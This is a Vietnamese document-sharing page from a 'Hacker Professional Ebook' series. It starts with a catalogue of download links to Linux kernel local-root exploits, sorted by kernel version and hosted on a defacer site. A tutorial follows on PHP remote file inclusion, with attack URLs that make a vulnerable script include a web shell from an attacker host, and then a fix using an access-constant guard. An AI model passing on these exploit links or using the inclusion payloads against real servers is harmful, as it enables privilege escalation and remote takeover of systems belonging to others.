1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 357 pptx

6 85 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề Exploit Kernel Local Root
Tác giả Dinhcaohack
Trường học Unknown University
Chuyên ngành Computer Science
Thể loại Bài viết
Năm xuất bản 2025
Thành phố Unknown
Định dạng
Số trang 6
Dung lượng 80,14 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Hacker sẻ lợi dụng điều này để tạo ra một số biến bất hợp pháp để truy cập và xử lý các câu lệnh bất trái phép ngay trên chính script bị lổi.. *Phương thức: Vì trong PHP cho phép khởi tạ

Trang 1

http://www.worlddefacers.de/local/2.4-b.zip http://www.worlddefacers.de/local/2.4-w.zip http://www.worlddefacers.de/local/2.4.-m.25.zip

=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit Kernel Local Root 2.4.18

http://www.worlddefacers.de/local/brk

http://www.worlddefacers.de/local/newlocal http://www.worlddefacers.de/local/kmod

http://www.worlddefacers.de/local/brk

http://www.worlddefacers.de/local/2.4-k.zip http://www.worlddefacers.de/local/2.4-b.zip http://www.worlddefacers.de/local/2.4-w.zip http://www.worlddefacers.de/local/2.4.-m.25.zip

=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit Kernel Local Root 2.4.19

http://www.worlddefacers.de/local/brk

http://www.worlddefacers.de/local/newlocal http://www.worlddefacers.de/local/kmod

http://www.worlddefacers.de/local/2.4-k.zip http://www.worlddefacers.de/local/2.4-b.zip http://www.worlddefacers.de/local/2.4-w.zip http://www.worlddefacers.de/local/2.4.-m.25.zip

=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit Kernel Local Root 2.4.20

http://www.worlddefacers.de/local/ptrace

http://www.worlddefacers.de/local/kmod

http://www.worlddefacers.de/local/elfbl

http://www.worlddefacers.de/local/brk

http://www.worlddefacers.de/local/2.4-k.zip http://www.worlddefacers.de/local/2.4-b.zip http://www.worlddefacers.de/local/2.4-w.zip http://www.worlddefacers.de/local/2.4.-m.25.zip

=-=-=-=-=-=-=-=-=-=-=-=-=-=

Trang 2

Exploit Kernel Local Root 2.4.21

http://www.worlddefacers.de/local/brk2

http://www.worlddefacers.de/local/ptrace

http://www.worlddefacers.de/local/2.4-k.zip http://www.worlddefacers.de/local/2.4-b.zip http://www.worlddefacers.de/local/2.4-w.zip http://www.worlddefacers.de/local/2.4.-m.25.zip

=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit Kernel Local Root 2.4.22

http://www.worlddefacers.de/local/brk2

http://www.worlddefacers.de/local/ptrace

http://www.worlddefacers.de/local/2.4-k.zip http://www.worlddefacers.de/local/2.4-b.zip http://www.worlddefacers.de/local/2.4-w.zip http://www.worlddefacers.de/local/2.4.-m.25.zip

=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit Kernel Local Root 2.4.23

http://www.worlddefacers.de/local/brk2

=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit Kernel Local Root 2.4.24

http://www.worlddefacers.de/local/brk2

http://www.worlddefacers.de/local/2.4-k.zip http://www.worlddefacers.de/local/2.4-b.zip http://www.worlddefacers.de/local/2.4-w.zip http://www.worlddefacers.de/local/2.4.-m.25.zip

=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit Kernel Local Root 2.6.2

http://www.worlddefacers.de/local/brk2

=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit Kernel Local Root 2.6.*

Trang 3

http://www.worlddefacers.de/local/2.6.x_logrotate.zip

=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit Kernel Local Root 2.6.13->2.6.17.4

http://www.worlddefacers.de/local/2.6.13-17.zip

http://www.worlddefacers.de/local/2.6.13-17-2.zip

http://www.worlddefacers.de/local/2.6.13-17-3.zip

http://www.worlddefacers.de/local/2.6.17-17.4.zip

dinhcaohack (vniss)

Phân tích exploit PHP remote include file và cách fixed

*Giới thiệu:

Như các bạn biết thì trong PHP do không cần khai báo biến trước như trong C, C++, C# và PHP lại hổ trợ biến từ trình duyệt Kết quả của điều này là : Nếu như một coder không chú ý kỉ càng về việc kiểm tra biến, kiểm tra quá trình khởi tạo biến Hacker sẻ lợi dụng điều này để tạo ra một số biến bất hợp pháp để truy cập và

xử lý các câu lệnh bất trái phép ngay trên chính script bị lổi

*Phương thức:

Vì trong PHP cho phép khởi tạo biến từ forrm ví dụ:

<form action="script.php" method="post">

<input type="text" name="dungit" />

<input type="submit" value="OK" />

</form>

Thì trong script.php sẻ tự động tạo ra một biến có tên $dungit và giá trị của nó là giá trị trong ô text nhập vào Nếu như trong script.php đã có sẳn biến $dungit và biến $dungit chưa được gán giá trị Thì nó sẻ tự động gán giá trị của $dungit bởi giá trị trong ô text nhập vào

Như vậy dungit lấy một ví dụ:

giả sử trong file common.php (Giả sử file này chỉ là một phần cho file khác nó

Trang 4

được dùng để sát nhập vào một file khác(Tôi ví dụ như thế này để sử dụng lại ví dụ này cho cơ chế fixx lổi sau)) của một script nào đó có dạng:

<?php

//

include($dungit.'confing.php');

//

?>

và trong file index.php (File sẻ sử dụng common.php) có dạng:

<?php

//

include('common.php');

//

?>

Nếu như bạn nhình vào common.php và bạn thấy rằng $dungit chưa được khởi gán giá trị thì Nó sẻ có bug rất nguy hiểm đó là tôi sẻ gán giá trị cho biến $dungit thành một đường dẩn tới file php của tôi(Shell chẳng hạn)

Tôi sẻ gỏ trên trình duyệt:

a.http://www.domain.com/[script]/common.php?dungit=http://myhosst.com/myshe ll.inc?

Gỏ như trên tương đương với biến của form theo phương thưc GET Và khi vào common.php thì các vấn đề sau đây sẻ xảy ra:

Biến $dungit = http://myhosst.com/myshell.inc?

và câu lệnh include sẻ có dạng:

include($dungit.'config.php'); <=>

include(http://myhosst.com/myshell.inc?config.php);

Cái này có ý nghĩa gì? Nó sẻ truy cập con shell và củng gửi vào con shell biến config.php có gí trị null.Và trong con shell thì không sử dụng biến này nên nó không có ý nghĩa nữa và nó tương đương:

include(http://myhosst.com/myshell.inc);

Thế là xong

Trang 5

b.http://www.domain.com/[script]/common.php?dungit=http://myhosst.com/

Như vậy giá trị của biến $dungit=http://myhosst.com/ và câu lệnh include sẻ có dạng:

include(http://myhosst.com/config.php);

Như vậy tôi chỉ cần thay đổi tên con shell trên host của tôi thành config.php thì tôi

đã đánh lừa được nó và củng include được shell

*Nguyên nhân

À đến đây các bạn sẻ test thử câu lệnh của tôi, và bạn sẻ thấy trang trắng? Đúng.Vì

do bạn config file php.ini theo recommend của php.net đối với phiên bản từ 4.2.0 trở lên

Đối với php phiên bản dưới 4.2.0 nếu config file php.ini theo recommend của php.net thì sẻ bị dính bug trên nếu như coder yếu trong secure

*Fixxed

> Cách thứ nhất: Lấy lại ví dụ trên:

+Trong file bị dính lổi này bạn thêm vào câu lệnh để nếu như sự truy cập vào nó là trái phep thì php không biên dịch ( thoát) các câu lệnh tiếp theo

Bạn thêm câu lệnh này ngay đầu tiên của common.php

if ( !defined('ACCESSOK') )

{

die('Ban khong duoc phep truy cap file nay.');

}

Ý nghĩa: Nếu Hằng ACESSOK không phải là true thì thoát không biên dịch các dòng lệnh tiếp theo.Có nghĩa khi bạn truy cập vào common.php thì nó sẻ thoát Như vậy tao được file common.php là

<?php

if ( !defined('ACCESSOK') )

{

Trang 6

die('Ban khong duoc phep truy cap file nay.');

}

//

include($dungit.'confing.php');

//

?>

+ Trong tất cả các file có sử dụng common.phpTrong ví dụ này là index.php bạn phải cho hằng ACCESSOK = true để được phép truy cập các câu lệnh còn lại bạn thêm dòng này ngay trước include common.php

define('ACCESSOK', true);

$dungit = null;

ý nghĩa, khi common.php được include vào index.php thì ACCESSOK đã bằng true nên nó sẻ biên dịch tất cả câu lệnh có trong common.php

Ngày đăng: 04/07/2014, 12:20

TỪ KHÓA LIÊN QUAN